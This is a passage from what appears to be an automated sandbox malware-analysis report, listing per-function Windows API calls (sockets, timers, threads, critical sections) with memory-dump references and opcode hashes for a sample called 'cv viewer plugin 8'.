                                                    • RtlEnterCriticalSection.NTDLL(016D71E0), ref: 016A50B8
                                                    • RtlLeaveCriticalSection.NTDLL(016D71E0), ref: 016A50C1
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                    • String ID:
                                                    • API String ID: 2062355503-0
                                                    • Opcode ID: 3ccbf40577d6a20c12059c26810050d3b4220fb638188504f7fb8e36af882111
                                                    • Instruction ID: 019b0bfad09e11321a81ac5f0490a0ebce7de1cb65bb2a39dbd02a9ae512bc24
                                                    • Opcode Fuzzy Hash: 3ccbf40577d6a20c12059c26810050d3b4220fb638188504f7fb8e36af882111
                                                    • Instruction Fuzzy Hash: 15B17971D0025E9FDF21DFA4CC40BEEBBB5AF14304F64409AE505A7281DBB45A49CF96

                                                    Control-flow Graph

                                                    APIs
                                                    • RtlEnterCriticalSection.NTDLL(?), ref: 016A2706
                                                    • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 016A272B
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,016C5B53), ref: 016A2738
                                                      • Part of subcall function 016A1712: __EH_prolog.LIBCMT ref: 016A1717
                                                    • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 016A2778
                                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 016A27D9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                    • String ID: timer
                                                    • API String ID: 4293676635-1792073242
                                                    • Opcode ID: 39e887e2b0ea1eb3c3d3c2857447751819e145139625cdff493878b56ff4490f
                                                    • Instruction ID: ea865469ff8e8dd493792413a966d03658cf569054b8f820d9f5928f34f33be9
                                                    • Opcode Fuzzy Hash: 39e887e2b0ea1eb3c3d3c2857447751819e145139625cdff493878b56ff4490f
                                                    • Instruction Fuzzy Hash: 2A318BB1504706AFD310DF29CD84B66BBE8FB48B24F40462EF96582680D770E910CFA5

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 951 16a29ee-16a2a06 952 16a2a0c-16a2a10 951->952 953 16a2ab3-16a2abb call 16b0b10 951->953 955 16a2a39-16a2a4c WSASetLastError closesocket call 16aa509 952->955 956 16a2a12-16a2a15 952->956 960 16a2abe-16a2ac6 953->960 961 16a2a51-16a2a55 955->961 956->955 959 16a2a17-16a2a36 call 16b0b10 call 16a2f50 956->959 959->955 961->953 964 16a2a57-16a2a5f call 16b0b10 961->964 969 16a2a69-16a2a71 call 16b0b10 964->969 970 16a2a61-16a2a67 964->970 976 16a2aaf-16a2ab1 969->976 977 16a2a73-16a2a79 969->977 970->969 971 16a2a7b-16a2aad ioctlsocket WSASetLastError closesocket call 16aa509 970->971 971->976 976->953 976->960 977->971 977->976
                                                    APIs
                                                    • WSASetLastError.WS2_32(00000000), ref: 016A2A3B
                                                    • closesocket.WS2_32 ref: 016A2A42
                                                    • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 016A2A89
                                                    • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 016A2A97
                                                    • closesocket.WS2_32 ref: 016A2A9E
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLastclosesocket$ioctlsocket
                                                    • String ID:
                                                    • API String ID: 1561005644-0
                                                    • Opcode ID: d98bab9469ca43c18244f2c02750d074a3ba45e8b193436f07aed3241ef44bc2
                                                    • Instruction ID: 2e6cd895cd7438c3f026e6316846ab8decb09ca925022418ac506512658c7990
                                                    • Opcode Fuzzy Hash: d98bab9469ca43c18244f2c02750d074a3ba45e8b193436f07aed3241ef44bc2
                                                    • Instruction Fuzzy Hash: EB210871A1020AAFDB309FBC9D6866ABAEAAF44215F14856EFA55C3241EB74CD40CF50
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 016A1BAC
                                                    • RtlEnterCriticalSection.NTDLL ref: 016A1BBC
                                                    • RtlLeaveCriticalSection.NTDLL ref: 016A1BEA
                                                    • RtlEnterCriticalSection.NTDLL ref: 016A1C13
                                                    • RtlLeaveCriticalSection.NTDLL ref: 016A1C56
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$H_prolog
                                                    • String ID:
                                                    • API String ID: 1633115879-0
                                                    • Opcode ID: 06873921d0d140c1d715378f08ca449e092b31b15c0a3afffcf27dcfd5b75f4e
                                                    • Instruction ID: 127a428f2fecc6c559c7fc5e02e5242ec594d9be40e56be6bd5e537405ece210
                                                    • Opcode Fuzzy Hash: 06873921d0d140c1d715378f08ca449e092b31b15c0a3afffcf27dcfd5b75f4e
                                                    • Instruction Fuzzy Hash: C42168B5A002059FDB15CF68C984BAABBA5FF49720F10818AE81A97301D775ED01CFA0
                                                    APIs
                                                    • WSASetLastError.WS2_32(00000000), ref: 016A2EEE
                                                    • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 016A2EFD
                                                    • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 016A2F0C
                                                    • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 016A2F36
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$Socketsetsockopt
                                                    • String ID:
                                                    • API String ID: 2093263913-0
                                                    • Opcode ID: 745af3e7a470d5997e1bb8d674a2201dc096270af0b2ab132881a2772a31253c
                                                    • Instruction ID: 9e05b4ba9976b0ae4d98566eb6c18d61e43d10470006765e015311fc56cd5fb5
                                                    • Opcode Fuzzy Hash: 745af3e7a470d5997e1bb8d674a2201dc096270af0b2ab132881a2772a31253c
                                                    • Instruction Fuzzy Hash: 09017571650214BFDB305F69DC89BABBBADEB89771F00C569F918CB281D775C8008BA0
                                                    APIs
                                                      • Part of subcall function 016A2D39: WSASetLastError.WS2_32(00000000), ref: 016A2D47
                                                      • Part of subcall function 016A2D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 016A2D5C
                                                    • WSASetLastError.WS2_32(00000000), ref: 016A2E6D
                                                    • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 016A2E83
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$Sendselect
                                                    • String ID: 3'
                                                    • API String ID: 2958345159-280543908
                                                    • Opcode ID: c0ab25509d2fa021cbef58e8aceb2e8ca5045c96f6ae462b19507702e6c452fa
                                                    • Instruction ID: 4c36a4f0a68a3e16407250e43b30fd747aab23669b15f13fbf2f660d61dee1bd
                                                    • Opcode Fuzzy Hash: c0ab25509d2fa021cbef58e8aceb2e8ca5045c96f6ae462b19507702e6c452fa
                                                    • Instruction Fuzzy Hash: 3931BE71A1021A9FDF11AFA4CC657EEBBFAAF14314F40445DE90497241E7B599818FE0
                                                    APIs
                                                    • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,016A83D3,?,?,00000000), ref: 016A96D0
                                                    • getsockname.WS2_32(?,?,?), ref: 016A96E6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLastgetsockname
                                                    • String ID: &'
                                                    • API String ID: 566540725-655172784
                                                    • Opcode ID: 1c04f03745ef82709174e9de739b3f0f66e4661c8c0ed68b7e503576b5463359
                                                    • Instruction ID: 7040d1472380d15ac03a0beb2607514adc5a42a20dce667aa6ca36a031da323b
                                                    • Opcode Fuzzy Hash: 1c04f03745ef82709174e9de739b3f0f66e4661c8c0ed68b7e503576b5463359
                                                    • Instruction Fuzzy Hash: 55217C72A102199FDB10DF68DC44ADEBBF5FF48324F20856AE818EB280D735E9458B94
                                                    APIs
                                                    • WSASetLastError.WS2_32(00000000), ref: 016A2AEA
                                                    • connect.WS2_32(?,?,?), ref: 016A2AF5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLastconnect
                                                    • String ID: 3'
                                                    • API String ID: 374722065-280543908
                                                    • Opcode ID: 757df049666be7dc0e310e8781e115b44a8efda06044451a8bc3d8348485f5fc
                                                    • Instruction ID: f59565d922213d05f1b8aa540790d3e06cea25e69c59f3ff3b3aa1c7292b567e
                                                    • Opcode Fuzzy Hash: 757df049666be7dc0e310e8781e115b44a8efda06044451a8bc3d8348485f5fc
                                                    • Instruction Fuzzy Hash: 3A21AA70E101199BDF14AFA8CC646EEBBBAAF54324F40459DED1897380DB748D418F95
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 80d486c79619da2958a8e8359507a0b61f48fdfd6b22d2a455a26d0fdbdbfb0c
                                                    • Instruction ID: 3edf6436fcfe86f8573f5da3732abd96ccfa68e3cfb6e16d5ef117a1e3c11522
                                                    • Opcode Fuzzy Hash: 80d486c79619da2958a8e8359507a0b61f48fdfd6b22d2a455a26d0fdbdbfb0c
                                                    • Instruction Fuzzy Hash: E8514DB1A04216DFDB04CF68C9516AABBF1FF19320F10815EE8699B380D774D911CFA0
                                                    APIs
                                                    • InterlockedIncrement.KERNEL32(?), ref: 016A36A7
                                                      • Part of subcall function 016A2420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 016A2432
                                                      • Part of subcall function 016A2420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 016A2445
                                                      • Part of subcall function 016A2420: RtlEnterCriticalSection.NTDLL(?), ref: 016A2454
                                                      • Part of subcall function 016A2420: InterlockedExchange.KERNEL32(?,00000001), ref: 016A2469
                                                      • Part of subcall function 016A2420: RtlLeaveCriticalSection.NTDLL(?), ref: 016A2470
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                    • String ID:
                                                    • API String ID: 1601054111-0
                                                    • Opcode ID: f3f41a2af00a7aa58cb0c34e78f0e1422f091ad520228162d13bfd3bf72cf294
                                                    • Instruction ID: 387b8ac9e9630ce1d0756871ca2c016c749cbe84c268d48caec3867f188fb57d
                                                    • Opcode Fuzzy Hash: f3f41a2af00a7aa58cb0c34e78f0e1422f091ad520228162d13bfd3bf72cf294
                                                    • Instruction Fuzzy Hash: 8D1191B5200209ABDF219E58DC85FBA3F6AFF54750F50411AFA56CA390C734DC618F98
                                                    APIs
                                                    • __beginthreadex.LIBCMT ref: 016B2106
                                                    • CloseHandle.KERNEL32(?,?,?,?,?,00000002,016AA989,00000000), ref: 016B2137
                                                    • ResumeThread.KERNELBASE(?,?,?,?,?,00000002,016AA989,00000000), ref: 016B2145
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseHandleResumeThread__beginthreadex
                                                    • String ID:
                                                    • API String ID: 1685284544-0
                                                    • Opcode ID: d16cb1ebb5a9ec1c1b3b8c0c554afb15882b3770f3ee3b8b3b7e109d8da9b188
                                                    • Instruction ID: 14162cb8974540b6eec6e7301d29545ecdea95b6e00fefcd52a3899f58d72e79
                                                    • Opcode Fuzzy Hash: d16cb1ebb5a9ec1c1b3b8c0c554afb15882b3770f3ee3b8b3b7e109d8da9b188
                                                    • Instruction Fuzzy Hash: 2FF0AF74300201ABE7209E5CDCD0B95B3E9BB58326F24052EF354C7380C771A8928B90
                                                    APIs
                                                    • InterlockedIncrement.KERNEL32(016D72B4), ref: 016A1ABA
                                                    • WSAStartup.WS2_32(00000002,00000000), ref: 016A1ACB
                                                    • InterlockedExchange.KERNEL32(016D72B8,00000000), ref: 016A1AD7
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Interlocked$ExchangeIncrementStartup
                                                    • String ID:
                                                    • API String ID: 1856147945-0
                                                    • Opcode ID: 1186724e94ae0d6ba1f3a30e22d5774110805ad6847e42cc873ea50e5e76b8f5
                                                    • Instruction ID: 4e347c03c9dc41fd3e8c3d03db7037d8c0716c72679d2a399e6816f1fee0981e
                                                    • Opcode Fuzzy Hash: 1186724e94ae0d6ba1f3a30e22d5774110805ad6847e42cc873ea50e5e76b8f5
                                                    • Instruction Fuzzy Hash: 6BD05E71A406185FD32066A5AC0EA78776CE706615F400255FDAAC15C8EA516920CBE7
                                                    APIs
                                                    • GetLocalTime.KERNEL32(0040C2B8), ref: 0040D3AE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2643509901.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.2643509901.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID: LocalTime
                                                    • String ID: /chk
                                                    • API String ID: 481472006-3837807730
                                                    • Opcode ID: 81fea34e64df1d5a819294562937da6b525a449c43d328daf9550e8eb28591a0
                                                    • Instruction ID: 2f21ab3d2b15a7743f83e56fa66ae328da3fe409015aafe24f14fc44fa3165b0
                                                    • Opcode Fuzzy Hash: 81fea34e64df1d5a819294562937da6b525a449c43d328daf9550e8eb28591a0
                                                    • Instruction Fuzzy Hash: FBE0C231E48202FAC30037E08E0056835A2A640388321827FE496B41D0D77D584FB64F
                                                    APIs
                                                    • GetLocalTime.KERNEL32(0040C2B8), ref: 0040D3AE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2643509901.000000000040B000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.2643509901.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID: LocalTime
                                                    • String ID: /chk
                                                    • API String ID: 481472006-3837807730
                                                    • Opcode ID: 95781f5485952f264126ab4b316af5e3a5f75fb6c3906419faef0809740a7061
                                                    • Instruction ID: 3684c8ff98119adf631e5acffbe66ce2e941c85b833f335e282929d562624734
                                                    • Opcode Fuzzy Hash: 95781f5485952f264126ab4b316af5e3a5f75fb6c3906419faef0809740a7061
                                                    • Instruction Fuzzy Hash: 7ED0C934D44203FAC6146BA08E4452975B16614349321423BE856B22E0C73D694EA65F
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 016A4BF2
                                                      • Part of subcall function 016A1BA7: __EH_prolog.LIBCMT ref: 016A1BAC
                                                      • Part of subcall function 016A1BA7: RtlEnterCriticalSection.NTDLL ref: 016A1BBC
                                                      • Part of subcall function 016A1BA7: RtlLeaveCriticalSection.NTDLL ref: 016A1BEA
                                                      • Part of subcall function 016A1BA7: RtlEnterCriticalSection.NTDLL ref: 016A1C13
                                                      • Part of subcall function 016A1BA7: RtlLeaveCriticalSection.NTDLL ref: 016A1C56
                                                      • Part of subcall function 016AE0F8: __EH_prolog.LIBCMT ref: 016AE0FD
                                                      • Part of subcall function 016AE0F8: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 016AE17C
                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 016A4CF2
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                    • String ID:
                                                    • API String ID: 1927618982-0
                                                    • Opcode ID: f74639ae4ee6f9b34263baa348ac7bf3f061103f152b8e3ad95a617ac359344d
                                                    • Instruction ID: 18f435084eb1a0873a7792abe7cb0e6ca874798d1721414666780819faa117bd
                                                    • Opcode Fuzzy Hash: f74639ae4ee6f9b34263baa348ac7bf3f061103f152b8e3ad95a617ac359344d
                                                    • Instruction Fuzzy Hash: 37512571D042499FDB15DFA8C884AEEBFB9EF18310F54805EE906AB351DB709A44CFA4
                                                    APIs
                                                    • WSASetLastError.WS2_32(00000000), ref: 016A2D47
                                                    • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 016A2D5C
                                                      • Part of subcall function 016AA509: WSAGetLastError.WS2_32(00000000,?,?,016A2A51), ref: 016AA517
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$Send
                                                    • String ID:
                                                    • API String ID: 1282938840-0
                                                    • Opcode ID: 539240ef4136980dbd361a6917387236355c3e6b2e7af705b2eb3cbb0baef1fb
                                                    • Instruction ID: 6ac8bb667577d77ad84c2ef4082f2dc259e2c56145805b6ad7841763a590ada3
                                                    • Opcode Fuzzy Hash: 539240ef4136980dbd361a6917387236355c3e6b2e7af705b2eb3cbb0baef1fb
                                                    • Instruction Fuzzy Hash: 490175B6500209AFD7206F988C9486BBAFDEB45264750452EF85993200DB719D508BA1
                                                    APIs
                                                    • WSASetLastError.WS2_32(00000000), ref: 016A8407
                                                    • shutdown.WS2_32(?,00000002), ref: 016A8410
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLastshutdown
                                                    • String ID:
                                                    • API String ID: 1920494066-0
                                                    • Opcode ID: 70ec5ef75e70a34190026504a3b5760ad2a675f06a79f01d4a3e86aad0ec9b97
                                                    • Instruction ID: 67a4cd416da6e2a9e5abadba1e70a67a023180fd35cfde1d76ae402a9af14f34
                                                    • Opcode Fuzzy Hash: 70ec5ef75e70a34190026504a3b5760ad2a675f06a79f01d4a3e86aad0ec9b97
                                                    • Instruction Fuzzy Hash: 9FF06D716053158FC720AF58DC14A6AB7E9FF18321F41881DE99597381D775AC008FA5
                                                    APIs
                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F0F,00000000), ref: 00404005
                                                      • Part of subcall function 00403EAC: GetVersionExA.KERNEL32 ref: 00403ECB
                                                    • HeapDestroy.KERNEL32 ref: 00404044
                                                      • Part of subcall function 004043CB: HeapAlloc.KERNEL32(00000000,00000140,0040402D,000003F8), ref: 004043D8
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2643509901.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.2643509901.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID: Heap$AllocCreateDestroyVersion
                                                    • String ID:
                                                    • API String ID: 2507506473-0
                                                    • Opcode ID: 785e23c1ed37029bd7fa1e4a136f418f238003ec06b3befa2c01f286c825b2ce
                                                    • Instruction ID: b1684c5e0161eeb02f30399066ba6d75b4260e35b9d13e26dc8fbe5d47634710
                                                    • Opcode Fuzzy Hash: 785e23c1ed37029bd7fa1e4a136f418f238003ec06b3befa2c01f286c825b2ce
                                                    • Instruction Fuzzy Hash: F5F092F0656301DAEB301B75AE46B3A39949BC0796F20443BF740F91E1EF7C8481960D
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 016A511E
                                                      • Part of subcall function 016A3D7E: htons.WS2_32(?), ref: 016A3DA2
                                                      • Part of subcall function 016A3D7E: htonl.WS2_32(00000000), ref: 016A3DB9
                                                      • Part of subcall function 016A3D7E: htonl.WS2_32(00000000), ref: 016A3DC0
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: htonl$H_prologhtons
                                                    • String ID:
                                                    • API String ID: 4039807196-0
                                                    • Opcode ID: db305c0a45f076f7de5a693c61f00ef239de0008dfb59fff8d59d02cf51d2800
                                                    • Instruction ID: d88a0e9a7a1efaabbca821dabf133c7a3d1dc543cb13bfff0943f1146b75bc8d
                                                    • Opcode Fuzzy Hash: db305c0a45f076f7de5a693c61f00ef239de0008dfb59fff8d59d02cf51d2800
                                                    • Instruction Fuzzy Hash: 31814975D0424E8ECF05DFA8D8809EEBBB5EF58210F50819ED852B7240EB759E09CFA5
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016DA000.00000040.00001000.00020000.00000000.sdmp, Offset: 016DA000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16da000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 345633fe2eb2702e53b14e9ba4bdf8ae01d41b0f9c3389d1a6cecf9513a0e11c
                                                    • Instruction ID: 72b5ab7239fc00d4c14bdcb5d9aaf31e99c24d336c1d524b6c57fa13af0619f5
                                                    • Opcode Fuzzy Hash: 345633fe2eb2702e53b14e9ba4bdf8ae01d41b0f9c3389d1a6cecf9513a0e11c
                                                    • Instruction Fuzzy Hash: 65417FF260D704AFD3156F29DC85B7EFBE4EF95320F06492EE6C583680E63518408B56
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: a6a77ea6c121a3830812591c55f570a7b2cc8de48b947cc0e2bcf9295a80807e
                                                    • Instruction ID: 9185ac44dfd6576d83aaa68aaa88448a21be175da1307869f8c776b582c0ec55
                                                    • Opcode Fuzzy Hash: a6a77ea6c121a3830812591c55f570a7b2cc8de48b947cc0e2bcf9295a80807e
                                                    • Instruction Fuzzy Hash: B6412671A0120AAFCF04DF99CC90EEEBBB9FF98214F44416EE545A7240DB749A45CFA4
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 016AE9C6
                                                      • Part of subcall function 016A1A01: TlsGetValue.KERNEL32 ref: 016A1A0A
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: H_prologValue
                                                    • String ID:
                                                    • API String ID: 3700342317-0
                                                    • Opcode ID: b7b3f8899221b19375714f05ea8f1076b4bc9a9630b7db0da9f0dd2e124b7444
                                                    • Instruction ID: eeaeaa5173559deaec3ff2ea5f0bcea866bd3957a3146143ef3dd7ea87147770
                                                    • Opcode Fuzzy Hash: b7b3f8899221b19375714f05ea8f1076b4bc9a9630b7db0da9f0dd2e124b7444
                                                    • Instruction Fuzzy Hash: 7E213BB190420AAFDB00DFA9D950AEEBBF9FB59310F14411EE919A3240D771AD01CFA5
                                                    APIs
                                                    • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 016A33CC
                                                      • Part of subcall function 016A32AB: __EH_prolog.LIBCMT ref: 016A32B0
                                                      • Part of subcall function 016A32AB: RtlEnterCriticalSection.NTDLL(?), ref: 016A32C3
                                                      • Part of subcall function 016A32AB: RtlLeaveCriticalSection.NTDLL(?), ref: 016A32EF
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$CompareEnterExchangeH_prologInterlockedLeave
                                                    • String ID:
                                                    • API String ID: 1518410164-0
                                                    • Opcode ID: 29d84ac17828fb2ec3fbffcb819de7f2b6e8491378b054067f06eb363155ca19
                                                    • Instruction ID: 9f343610076bf7e8d679d004b8bd0aabd07a74d395816fbe15cfebffdb841483
                                                    • Opcode Fuzzy Hash: 29d84ac17828fb2ec3fbffcb819de7f2b6e8491378b054067f06eb363155ca19
                                                    • Instruction Fuzzy Hash: A4016D70215606AFD7048F59DC85A65BBA9FF45320B60831EE928873C0EB30EC21CFA4
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016DA000.00000040.00001000.00020000.00000000.sdmp, Offset: 016DA000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16da000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID: FileWrite
                                                    • String ID:
                                                    • API String ID: 3934441357-0
                                                    • Opcode ID: c870565fa74e86d18af65b579907c34f943609240586d018aac12c250ea55e6c
                                                    • Instruction ID: 9dae74baa5523fe783e64eee29d8919ba21daa0c90fa9b38e8e25ef7a7418407
                                                    • Opcode Fuzzy Hash: c870565fa74e86d18af65b579907c34f943609240586d018aac12c250ea55e6c
                                                    • Instruction Fuzzy Hash: FC0102F2608A109BD3107F0AD88567AFBF4EF84720F06082DE6C887A50E6354484CB97
                                                    APIs
                                                      • Part of subcall function 016AD3C4: __EH_prolog.LIBCMT ref: 016AD3C9
                                                    • __CxxThrowException@8.LIBCMT ref: 016ADCAE
                                                      • Part of subcall function 016B455A: RaiseException.KERNEL32(?,?,016AFB5F,?,?,?,?,?,?,?,016AFB5F,?,016D0FA8,?), ref: 016B45AF
                                                    Memory Dump Source
